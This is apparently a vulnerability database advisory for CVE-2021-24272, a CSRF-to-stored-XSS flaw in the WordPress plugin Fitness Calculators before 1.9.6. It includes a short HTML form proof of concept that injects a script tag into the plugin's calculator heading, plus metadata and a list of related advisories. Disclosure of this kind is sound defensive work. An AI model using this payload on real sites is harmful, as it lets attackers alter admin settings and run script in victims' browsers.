Fitness Calculators < 1.9.6 – Cross-Site Request Forgery to Cross-Site Scripting (XSS) | CVE 2021-24272 | Plugin Vulnerabilities

Description

The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue

Proof of Concept

<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
    <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
    <input type="submit" value="Save" name="submit">
</form>

Affects Plugins

fitness-calculators

Fixed in 1.9.6

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

0xB9

Submitter twitter

Verified

Yes

WPVDB ID

e643040b-1f3b-4c13-8a20-acfd069dcc4f

Timeline

Publicly Published

2021-04-14 (about 3 years ago)

Added

2021-04-14 (about 3 years ago)

Last Updated

2021-04-16 (about 3 years ago)

Other

Published

Title

Published

2023-12-27

Title

Spam protection, AntiSpam, FireWall by CleanTalk < 6.21 - Counters Reset/Creation via CSRF

Published

2022-03-21

Title

Export All URLs < 4.3 - Private/Draft Post/Page Title Disclosure via CSRF

Published

2023-02-17

Title

Extensions For CF7 < 2.0.9 - Arbitrary Plugin Activation via CSRF

Published

2024-03-29

Title

Slugs Manager < 2.7.0 - Cross-Site Request Forgery

Published

2023-01-20

Title

Bubble Menu - Circle Floating Menu < 3.0.2 - Form Deletion via CSRF